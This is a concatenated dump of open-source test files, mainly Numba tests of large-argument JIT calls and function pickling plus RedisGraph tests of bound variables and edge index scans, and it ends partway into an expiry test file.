+ g
+ h
+ i
+ j
+ k
+ l
+ m
+ n
+ o
+ p
)
a = sum(list(py_func()))
b = objmode_func()
self.assertEqual(a, b)
@skip_unless_py10
def test_large_args_inline_controlflow(self):
"""
Tests generating large args when one of the inputs
has inlined controlflow.
"""
def inline_func(flag):
return sum_jit_func(
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1 if flag else 2,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
arg41=1,
)
with self.assertRaises(UnsupportedError) as raises:
njit()(inline_func)(False)
self.assertIn(
'You can resolve this issue by moving the control flow out',
str(raises.exception)
)
@skip_unless_py10
def test_large_args_noninlined_controlflow(self):
"""
Tests generating large args when one of the inputs
has the change suggested in the error message
for inlined control flow.
"""
def inline_func(flag):
a_val = 1 if flag else 2
return sum_jit_func(
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
a_val,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
arg41=1,
)
py_func = inline_func
cfunc = njit()(inline_func)
a = py_func(False)
b = cfunc(False)
self.assertEqual(a, b)
@skip_unless_py10
def test_all_args_inline_controlflow(self):
"""
Tests generating only large args when one of the inputs
has inlined controlflow. This requires a special check
inside peep_hole_call_function_ex_to_call_function_kw
because it usually only handles varkwargs.
"""
def inline_func(flag):
return sum_jit_func(
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1 if flag else 2,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
)
with self.assertRaises(UnsupportedError) as raises:
njit()(inline_func)(False)
self.assertIn(
'You can resolve this issue by moving the control flow out',
str(raises.exception)
)
@skip_unless_py10
def test_all_args_noninlined_controlflow(self):
"""
Tests generating large args when one of the inputs
has the change suggested in the error message
for inlined control flow.
"""
def inline_func(flag):
a_val = 1 if flag else 2
return sum_jit_func(
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
a_val,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
)
py_func = inline_func
cfunc = njit()(inline_func)
a = py_func(False)
b = cfunc(False)
self.assertEqual(a, b)
@skip_unless_py10
def test_large_kws_inline_controlflow(self):
"""
Tests generating large kws when one of the inputs
has inlined controlflow.
"""
def inline_func(flag):
return sum_jit_func(
arg0=1,
arg1=1,
arg2=1,
arg3=1,
arg4=1,
arg5=1,
arg6=1,
arg7=1,
arg8=1,
arg9=1,
arg10=1,
arg11=1,
arg12=1,
arg13=1,
arg14=1,
arg15=1 if flag else 2,
)
with self.assertRaises(UnsupportedError) as raises:
njit()(inline_func)(False)
self.assertIn(
'You can resolve this issue by moving the control flow out',
str(raises.exception)
)
@skip_unless_py10
def test_large_kws_noninlined_controlflow(self):
"""
Tests generating large kws when one of the inputs
has the change suggested in the error message
for inlined control flow.
"""
def inline_func(flag):
a_val = 1 if flag else 2
return sum_jit_func(
arg0=1,
arg1=1,
arg2=1,
arg3=1,
arg4=1,
arg5=1,
arg6=1,
arg7=1,
arg8=1,
arg9=1,
arg10=1,
arg11=1,
arg12=1,
arg13=1,
arg14=1,
arg15=a_val,
)
py_func = inline_func
cfunc = njit()(inline_func)
a = py_func(False)
b = cfunc(False)
self.assertEqual(a, b)
```
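The threshold these tests target can be observed directly with the `dis` module: once a call site exceeds the limit described in the class docstring ((n_args / 2) + n_kws > 15), CPython 3.10 packs the arguments into a tuple/dict and emits `CALL_FUNCTION_EX` instead of the ordinary call opcodes. A small inspection sketch (the exact opcodes depend on the interpreter version, hence the guard):
```python
import dis
import sys

def opnames(src):
    return {ins.opname
            for ins in dis.get_instructions(compile(src, "<s>", "eval"))}

small_call = "f(" + ", ".join(str(i) for i in range(5)) + ")"
large_call = "f(" + ", ".join(str(i) for i in range(40)) + ")"

if sys.version_info[:2] == (3, 10):
    assert "CALL_FUNCTION" in opnames(small_call)
    assert "CALL_FUNCTION_EX" in opnames(large_call)
```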
#### File: numba/tests/test_unpickle_without_module.py
```python
import unittest
import pickle
import sys
import tempfile
from pathlib import Path
class TestUnpickleDeletedModule(unittest.TestCase):
def test_loading_pickle_with_no_module(self):
"""Create a module that uses Numba, import a function from it.
Then delete the module and pickle the function. The function
should load from the pickle without a problem.
        Note: this is a simplified version of how Numba might be used
        on a distributed system (e.g. with dask.distributed), where the
        pickle is sent to the worker but the original module is not.
"""
# Source code for temporary module we will make
source = "\n".join(
[
"from numba import vectorize",
"@vectorize(['float64(float64)'])",
"def inc1(x):",
" return x + 1",
]
)
# Create a temporary directory and add it to path.
modname = "tmp_module"
with tempfile.TemporaryDirectory() as tmp_dir:
sys.path.append(tmp_dir)
# Create tmp_module.py in there with our source code above.
filename = Path(f"{tmp_dir}/{modname}.py")
f = open(filename, "a")
f.write(source)
f.close()
# Import the temporary module before file is deleted
from tmp_module import inc1
# Remove from imported libraries
del sys.modules[modname]
# Pickle function and assert that it loads correctly
pkl = pickle.dumps(inc1)
f = pickle.loads(pkl)
self.assertEqual(f(2), 3)
``` |
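The property the test relies on — that a jitted function survives a pickle round-trip on its own, because Numba's dispatchers implement their own serialization rather than the default by-module-reference pickling — can be seen in a few lines. This is a minimal sketch of the round-trip itself, without the module-deletion machinery the test adds:
```python
# Minimal sketch: round-trip a jitted function through pickle.
# (The test above additionally deletes the defining module first.)
import pickle

from numba import njit

@njit
def inc1(x):
    return x + 1

inc1(2)  # compiling first is optional; done here to exercise the dispatcher
restored = pickle.loads(pickle.dumps(inc1))
assert restored(2) == 3
```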
{
"source": "10088/redisgraph-py",
"score": 2
} |
#### File: redisgraph-py/redisgraph/exceptions.py
```python
class VersionMismatchException(Exception):
def __init__(self, version):
self.version = version
```
#### File: tests/utils/base.py
```python
import unittest
import testtools
import mock
class TestCase(testtools.TestCase):
def setUp(self):
super(TestCase, self).setUp()
# NOTE(boris-42): Show all differences in complex objects
self.maxDiff = None
# NOTE(boris-42): Stop all mocks, to avoid hanging tests
self.addCleanup(mock.patch.stopall)
# NOTE(boris-42): testtools have old version of assertRaises
# which doesn't support usage with "with" context.
assertRaises = unittest.TestCase.assertRaises
``` |
{
"source": "10088/RedisGraph",
"score": 3
} |
#### File: tests/flow/test_bound_variables.py
```python
from common import *
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
redis_graph = None
class testBoundVariables(FlowTestsBase):
def __init__(self):
self.env = Env(decodeResponses=True)
global redis_graph
redis_con = self.env.getConnection()
redis_graph = Graph(redis_con, "G")
self.populate_graph()
def populate_graph(self):
global redis_graph
# Construct a graph with the form:
# (v1)-[:E]->(v2)-[:E]->(v3)
node_props = ['v1', 'v2', 'v3']
nodes = []
for idx, v in enumerate(node_props):
node = Node(label="L", properties={"val": v})
nodes.append(node)
redis_graph.add_node(node)
edge = Edge(nodes[0], "E", nodes[1])
redis_graph.add_edge(edge)
edge = Edge(nodes[1], "E", nodes[2])
redis_graph.add_edge(edge)
redis_graph.commit()
def test01_with_projected_entity(self):
query = """MATCH (a:L {val: 'v1'}) WITH a MATCH (a)-[e]->(b) RETURN b.val"""
actual_result = redis_graph.query(query)
# Verify that this query does not generate a Cartesian product.
execution_plan = redis_graph.execution_plan(query)
self.env.assertNotIn('Cartesian Product', execution_plan)
# Verify results.
expected_result = [['v2']]
self.env.assertEquals(actual_result.result_set, expected_result)
def test02_match_create_bound_variable(self):
# Extend the graph such that the new form is:
# (v1)-[:E]->(v2)-[:E]->(v3)-[:e]->(v4)
query = """MATCH (a:L {val: 'v3'}) CREATE (a)-[:E]->(b:L {val: 'v4'}) RETURN b.val"""
actual_result = redis_graph.query(query)
expected_result = [['v4']]
self.env.assertEquals(actual_result.result_set, expected_result)
self.env.assertEquals(actual_result.relationships_created, 1)
self.env.assertEquals(actual_result.nodes_created, 1)
def test03_procedure_match_bound_variable(self):
# Create a full-text index.
redis_graph.call_procedure("db.idx.fulltext.createNodeIndex", 'L', 'val')
# Project the result of scanning this index into a MATCH pattern.
query = """CALL db.idx.fulltext.queryNodes('L', 'v1') YIELD node MATCH (node)-[]->(b) RETURN b.val"""
# Verify that execution begins at the procedure call and proceeds into the traversals.
execution_plan = redis_graph.execution_plan(query)
# For the moment, we'll just verify that ProcedureCall appears later in the plan than
# its parent, Conditional Traverse.
traverse_idx = execution_plan.index("Conditional Traverse")
call_idx = execution_plan.index("ProcedureCall")
self.env.assertTrue(call_idx > traverse_idx)
# Verify the results
actual_result = redis_graph.query(query)
expected_result = [['v2']]
self.env.assertEquals(actual_result.result_set, expected_result)
def test04_projected_scanned_entity(self):
query = """MATCH (a:L {val: 'v1'}) WITH a MATCH (a), (b {val: 'v2'}) RETURN a.val, b.val"""
actual_result = redis_graph.query(query)
# Verify that this query generates exactly 2 scan ops.
execution_plan = redis_graph.execution_plan(query)
self.env.assertEquals(2, execution_plan.count('Scan'))
# Verify results.
expected_result = [['v1', 'v2']]
self.env.assertEquals(actual_result.result_set, expected_result)
```
#### File: tests/flow/test_edge_index_scans.py
```python
from common import *
people = ["Roi", "Alon", "Ailon", "Boaz", "Tal", "Omri", "Ori"]
redis_graph = None
class testEdgeByIndexScanFlow(FlowTestsBase):
def __init__(self):
self.env = Env(decodeResponses=True)
def setUp(self):
global redis_graph
redis_con = self.env.getConnection()
redis_graph = Graph(redis_con, "social")
self.populate_graph(redis_graph)
self.build_indices()
def tearDown(self):
self.env.cmd('flushall')
def populate_graph(self, redis_graph):
nodes = {}
# Create entities
node_id = 0
for p in people:
node = Node(label="person", properties={"name": p, "created_at": node_id})
redis_graph.add_node(node)
nodes[p] = node
node_id = node_id + 1
# Fully connected graph
edge_id = 0
for src in nodes:
for dest in nodes:
if src != dest:
edge = Edge(nodes[src], "knows", nodes[dest], properties={"created_at": edge_id * 2})
redis_graph.add_edge(edge)
edge = Edge(nodes[src], "friend", nodes[dest], properties={"created_at": edge_id * 2 + 1, "updated_at": edge_id * 3})
redis_graph.add_edge(edge)
edge_id = edge_id + 1
redis_graph.commit()
def build_indices(self):
global redis_graph
redis_graph.query("CREATE INDEX ON :person(age)")
redis_graph.query("CREATE INDEX FOR ()-[f:friend]-() ON (f.created_at)")
redis_graph.query("CREATE INDEX FOR ()-[f:knows]-() ON (f.created_at)")
# Validate that Cartesian products using index and label scans succeed
def test01_cartesian_product_mixed_scans(self):
query = "MATCH ()-[f:friend]->(), ()-[k:knows]->() WHERE f.created_at >= 0 RETURN f.created_at, k.created_at ORDER BY f.created_at, k.created_at"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Conditional Traverse', plan)
indexed_result = redis_graph.query(query)
query = "MATCH ()-[f:friend]->(), ()-[k:knows]->() RETURN f.created_at, k.created_at ORDER BY f.created_at, k.created_at"
plan = redis_graph.execution_plan(query)
self.env.assertNotIn('Edge By Index Scan', plan)
self.env.assertIn('Conditional Traverse', plan)
unindexed_result = redis_graph.query(query)
self.env.assertEquals(indexed_result.result_set, unindexed_result.result_set)
# Validate that Cartesian products using just index scans succeed
def test02_cartesian_product_index_scans_only(self):
query = "MATCH ()-[f:friend]->(), ()-[k:knows]->() WHERE f.created_at >= 0 AND k.created_at >= 0 RETURN f.created_at, k.created_at ORDER BY f.created_at, k.created_at"
plan = redis_graph.execution_plan(query)
# The two streams should both use index scans
self.env.assertEquals(plan.count('Edge By Index Scan'), 2)
self.env.assertNotIn('Conditional Traverse', plan)
indexed_result = redis_graph.query(query)
query = "MATCH ()-[f:friend]->(), ()-[k:knows]->() RETURN f.created_at, k.created_at ORDER BY f.created_at, k.created_at"
plan = redis_graph.execution_plan(query)
self.env.assertNotIn('Edge By Index Scan', plan)
self.env.assertIn('Conditional Traverse', plan)
unindexed_result = redis_graph.query(query)
self.env.assertEquals(indexed_result.result_set, unindexed_result.result_set)
# Validate that the appropriate bounds are respected when a Cartesian product uses the same index in two streams
def test03_cartesian_product_reused_index(self):
redis_graph.query("CREATE INDEX FOR ()-[f:friend]-() ON (f.updated_at)")
query = "MATCH ()-[a:friend]->(), ()-[b:friend]->() WHERE a.created_at >= 80 AND b.updated_at >= 120 RETURN a.created_at, b.updated_at"
plan = redis_graph.execution_plan(query)
# The two streams should both use index scans
self.env.assertEquals(plan.count('Edge By Index Scan'), 2)
self.env.assertNotIn('Conditional Traverse', plan)
expected_result = [[81, 120], [83, 120], [81, 123], [83, 123]]
result = redis_graph.query(query)
self.env.assertEquals(result.result_set, expected_result)
# Validate index utilization when filtering on a numeric field with the `IN` keyword.
def test04_test_in_operator_numerics(self):
# Validate the transformation of IN to multiple OR expressions.
query = "MATCH ()-[f:friend]-() WHERE f.created_at IN [1,2,3] RETURN f"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
# Validate that nested arrays are not scanned in index.
query = "MATCH ()-[f:friend]-() WHERE f.created_at IN [[1,2],3] RETURN f"
plan = redis_graph.execution_plan(query)
self.env.assertNotIn('Edge By Index Scan', plan)
self.env.assertIn('Conditional Traverse', plan)
# Validate the transformation of IN to multiple OR, over a range.
query = "MATCH (n)-[f:friend]->() WHERE f.created_at IN range(0,30) RETURN DISTINCT n.name ORDER BY n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
expected_result = [['Ailon'], ['Alon'], ['Roi']]
result = redis_graph.query(query)
self.env.assertEquals(result.result_set, expected_result)
# Validate the transformation of IN to empty index iterator.
query = "MATCH ()-[f:friend]-() WHERE f.created_at IN [] RETURN f.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
expected_result = []
result = redis_graph.query(query)
self.env.assertEquals(result.result_set, expected_result)
# Validate the transformation of IN OR IN to empty index iterators.
query = "MATCH ()-[f:friend]->() WHERE f.created_at IN [] OR f.created_at IN [] RETURN f.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
expected_result = []
result = redis_graph.query(query)
self.env.assertEquals(result.result_set, expected_result)
# Validate the transformation of multiple IN filters.
query = "MATCH (n)-[f:friend]->() WHERE f.created_at IN [0, 1, 2] OR f.created_at IN [14, 15, 16] RETURN n.name ORDER BY n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
expected_result = [['Alon'], ['Roi']]
result = redis_graph.query(query)
self.env.assertEquals(result.result_set, expected_result)
# Validate the transformation of multiple IN filters.
query = "MATCH (n)-[f:friend]->() WHERE f.created_at IN [0, 1, 2] OR f.created_at IN [14, 15, 16] OR f.created_at IN [] RETURN n.name ORDER BY n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
result = redis_graph.query(query)
self.env.assertEquals(result.result_set, expected_result)
def test07_index_scan_and_id(self):
query = """MATCH (n)-[f:friend]->() WHERE id(f)>=10 AND f.created_at<15 RETURN n.name ORDER BY n.name"""
plan = redis_graph.execution_plan(query)
query_result = redis_graph.query(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
self.env.assertEqual(2, len(query_result.result_set))
expected_result = [['Alon'], ['Roi']]
self.env.assertEquals(expected_result, query_result.result_set)
# Validate placement of index scans and filter ops when not all filters can be replaced.
def test08_index_scan_multiple_filters(self):
query = "MATCH (n)-[f:friend]->() WHERE f.created_at = 31 AND NOT EXISTS(f.fakeprop) RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertNotIn('Conditional Traverse', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Ailon"]
self.env.assertEquals(query_result.result_set[0], expected_result)
def test09_index_scan_with_params(self):
query = "MATCH (n)-[f:friend]->() WHERE f.created_at = $time RETURN n.name"
params = {'time': 31}
plan = redis_graph.execution_plan(query, params=params)
self.env.assertIn('Edge By Index Scan', plan)
query_result = redis_graph.query(query, params=params)
expected_result = ["Ailon"]
self.env.assertEquals(query_result.result_set[0], expected_result)
def test10_index_scan_with_param_array(self):
query = "MATCH (n)-[f:friend]->() WHERE f.created_at in $times RETURN n.name"
params = {'times': [31]}
plan = redis_graph.execution_plan(query, params=params)
self.env.assertIn('Edge By Index Scan', plan)
query_result = redis_graph.query(query, params=params)
expected_result = ["Ailon"]
self.env.assertEquals(query_result.result_set[0], expected_result)
def test11_single_index_multiple_scans(self):
query = "MATCH (p1:person {name: 'Roi'}), (p2:person {name: 'Alon'}) MERGE (p1)-[:friend {created_at: 100}]->(p2) MERGE (p1)-[:friend {created_at: 101}]->(p2)"
plan = redis_graph.execution_plan(query)
# Two index scans should be performed.
self.env.assertEqual(plan.count("Edge By Index Scan"), 2)
query_result = redis_graph.query(query)
# Two new relationships should be created.
self.env.assertEquals(query_result.relationships_created, 2)
def test16_runtime_index_utilization(self):
# find all person nodes whose friend edges have created_at in the range 33-37
# the current value (x) should be resolved at runtime
# an index query should be constructed for each created_at value
q = """UNWIND range(33, 37) AS x
MATCH (n)-[f:friend {created_at: x}]->()
RETURN n.name
ORDER BY n.name"""
plan = redis_graph.execution_plan(q)
self.env.assertIn('Edge By Index Scan', plan)
query_result = redis_graph.query(q)
expected_result = [['Ailon'], ['Ailon'], ['Boaz']]
self.env.assertEquals(query_result.result_set, expected_result)
# similar to the query above, only this time the filter is specified
# by an OR condition
q = """WITH 33 AS min, 37 AS max
MATCH (n)-[f:friend]->()
WHERE f.created_at = min OR f.created_at = max
RETURN n.name
ORDER BY n.name"""
plan = redis_graph.execution_plan(q)
self.env.assertIn('Edge By Index Scan', plan)
query_result = redis_graph.query(q)
expected_result = [['Ailon'], ['Boaz']]
self.env.assertEquals(query_result.result_set, expected_result)
# find all person nodes whose friend edge's created_at equals 'x' (33)
# 'x' value is known only at runtime
q = """WITH 33 AS x
MATCH (n)-[f:friend {created_at: x}]->()
RETURN n.name
ORDER BY n.name"""
plan = redis_graph.execution_plan(q)
self.env.assertIn('Edge By Index Scan', plan)
query_result = redis_graph.query(q)
expected_result = [["Ailon"]]
self.env.assertEquals(query_result.result_set, expected_result)
# find all person nodes whose friend edge's created_at equals x + 1
# the expression x+1 is evaluated to the constant 33 only at runtime
# expecting index query to be constructed at runtime
q = """WITH 32 AS x
MATCH (n)-[f:friend]->()
WHERE f.created_at = (x + 1)
RETURN n.name
ORDER BY n.name"""
plan = redis_graph.execution_plan(q)
self.env.assertIn('Edge By Index Scan', plan)
query_result = redis_graph.query(q)
expected_result = [["Ailon"]]
self.env.assertEquals(query_result.result_set, expected_result)
# same idea as the previous query, only we've switched the position of the
# operands; the queried attribute (f.created_at) is now on the right-hand
# side of the filter, expecting the same behavior
q = """WITH 32 AS x
MATCH (n)-[f:friend]->()
WHERE (x + 1) = f.created_at
RETURN n.name
ORDER BY n.name"""
plan = redis_graph.execution_plan(q)
self.env.assertIn('Edge By Index Scan', plan)
query_result = redis_graph.query(q)
expected_result = [["Ailon"]]
self.env.assertEquals(query_result.result_set, expected_result)
# make sure the All Node Scan is not removed, because we still need to filter
q = """MATCH (a)-[e:friend]->()
WHERE a.created_at > 5 AND e.created_at > a.created_at
RETURN DISTINCT a.name"""
plan = redis_graph.execution_plan(q)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Filter', plan)
self.env.assertIn('All Node Scan', plan)
query_result = redis_graph.query(q)
expected_result = [["Ori"]]
self.env.assertEquals(query_result.result_set, expected_result)
def test18_index_scan_and_label_filter(self):
query = "MATCH (n)-[f:friend]->(m) WHERE f.created_at = 1 RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertNotIn('All Node Scan', plan)
self.env.assertNotIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Roi"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person)-[f:friend]->(m) WHERE f.created_at = 1 RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertNotIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Roi"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person)-[f:friend]->(m:person) WHERE f.created_at = 1 RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Roi"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person {name: 'Roi'})-[f:friend]->(m:person) WHERE f.created_at = 1 RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Roi"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person {name: 'Alon'})-[f:friend]->(m:person) WHERE f.created_at = 1 RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
self.env.assertEquals(query_result.result_set, [])
query = "MATCH (n)<-[f:friend]-(m) WHERE f.created_at = 1 RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertNotIn('All Node Scan', plan)
self.env.assertNotIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Alon"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person)<-[f:friend]-(m) WHERE f.created_at = 1 RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertNotIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Alon"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person)<-[f:friend]-(m:person) WHERE f.created_at = 1 RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Alon"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person {name: 'Roi'})<-[f:friend]-(m:person) WHERE f.created_at = 1 RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
self.env.assertEquals(query_result.result_set, [])
query = "MATCH (n:person {name: 'Alon'})<-[f:friend]-(m:person) WHERE f.created_at = 1 RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Alon"]
self.env.assertEquals(query_result.result_set[0], expected_result)
def test19_index_scan_and_with(self):
query = "MATCH (n)-[f:friend]->(m) WHERE f.created_at = 1 WITH n RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertNotIn('All Node Scan', plan)
self.env.assertNotIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Roi"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person)-[f:friend]->(m) WHERE f.created_at = 1 WITH n RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertNotIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Roi"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person)-[f:friend]->(m:person) WHERE f.created_at = 1 WITH n RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Roi"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person {name: 'Roi'})-[f:friend]->(m:person) WHERE f.created_at = 1 WITH n RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Roi"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person {name: 'Alon'})-[f:friend]->(m:person) WHERE f.created_at = 1 WITH n RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
self.env.assertEquals(query_result.result_set, [])
query = "MATCH (n)<-[f:friend]-(m) WHERE f.created_at = 1 WITH n RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertNotIn('All Node Scan', plan)
self.env.assertNotIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Alon"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person)<-[f:friend]-(m) WHERE f.created_at = 1 WITH n RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertNotIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Alon"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person)<-[f:friend]-(m:person) WHERE f.created_at = 1 WITH n RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Alon"]
self.env.assertEquals(query_result.result_set[0], expected_result)
query = "MATCH (n:person {name: 'Roi'})<-[f:friend]-(m:person) WHERE f.created_at = 1 WITH n RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
self.env.assertEquals(query_result.result_set, [])
query = "MATCH (n:person {name: 'Alon'})<-[f:friend]-(m:person) WHERE f.created_at = 1 WITH n RETURN n.name"
plan = redis_graph.execution_plan(query)
self.env.assertIn('Edge By Index Scan', plan)
self.env.assertIn('Node By Label Scan', plan)
self.env.assertIn('Filter', plan)
query_result = redis_graph.query(query)
expected_result = ["Alon"]
self.env.assertEquals(query_result.result_set[0], expected_result)
def test20_index_scan_numeric_accuracy(self):
redis_graph = Graph(self.env.getConnection(), 'large_index_values')
redis_graph.query("CREATE INDEX FOR ()-[r:R1]-() ON (r.id)")
redis_graph.query("CREATE INDEX FOR ()-[r:R2]-() ON (r.id1, r.id2)")
redis_graph.query("UNWIND range(1, 5) AS v CREATE ()-[:R1 {id: 990000000262240068 + v}]->()")
redis_graph.query("UNWIND range(1, 5) AS v CREATE ()-[:R2 {id1: 990000000262240068 + v, id2: 990000000262240068 - v}]->()")
# test index search
result = redis_graph.query("MATCH ()-[u:R1{id: 990000000262240069}]->() RETURN u.id")
expected_result = [[990000000262240069]]
self.env.assertEquals(result.result_set, expected_result)
# test index search from child
result = redis_graph.query("MATCH ()-[u:R1]->() WITH min(u.id) as id MATCH ()-[u:R1{id: id}]->() RETURN u.id")
expected_result = [[990000000262240069]]
self.env.assertEquals(result.result_set, expected_result)
# test index search with or
result = redis_graph.query("MATCH ()-[u:R1]->() WHERE u.id = 990000000262240069 OR u.id = 990000000262240070 RETURN u.id ORDER BY u.id")
expected_result = [[990000000262240069], [990000000262240070]]
self.env.assertEquals(result.result_set, expected_result)
# test resetting index scan operation
result = redis_graph.query("MATCH ()-[u1:R1]->(), ()-[u2:R1]->() WHERE u1.id = 990000000262240069 AND (u2.id = 990000000262240070 OR u2.id = 990000000262240071) RETURN u1.id, u2.id ORDER BY u1.id, u2.id")
expected_result = [[990000000262240069, 990000000262240070], [990000000262240069, 990000000262240071]]
self.env.assertEquals(result.result_set, expected_result)
# test resetting the index scan operation when using the consume-from-child function
result = redis_graph.query("MATCH ()-[u:R1]->() WITH min(u.id) as id MATCH ()-[u1:R1]->(), ()-[u2:R1]->() WHERE u1.id = 990000000262240069 AND (u2.id = 990000000262240070 OR u2.id = 990000000262240071) RETURN u1.id, u2.id ORDER BY u1.id, u2.id")
expected_result = [[990000000262240069, 990000000262240070], [990000000262240069, 990000000262240071]]
self.env.assertEquals(result.result_set, expected_result)
# test resetting the index scan operation when a rebuild of the index is required
result = redis_graph.query("MATCH ()-[u:R1]->() WITH min(u.id) as id MATCH ()-[u1:R1]->(), ()-[u2:R1]->() WHERE u1.id = id AND (u2.id = 990000000262240070 OR u2.id = 990000000262240071) RETURN u1.id, u2.id ORDER BY u1.id, u2.id")
expected_result = [[990000000262240069, 990000000262240070], [990000000262240069, 990000000262240071]]
self.env.assertEquals(result.result_set, expected_result)
# test index scan with 2 different attributes
result = redis_graph.query("MATCH ()-[u:R2]->() WHERE u.id1 = 990000000262240069 AND u.id2 = 990000000262240067 RETURN u.id1, u.id2")
expected_result = [[990000000262240069, 990000000262240067]]
self.env.assertEquals(result.result_set, expected_result)
```
#### File: tests/flow/test_expiry.py
```python
from common import *
import time
GRAPH_ID = "expire"
class testExpiry():
def test01_expire_graph(self):
# create a redisgraph object
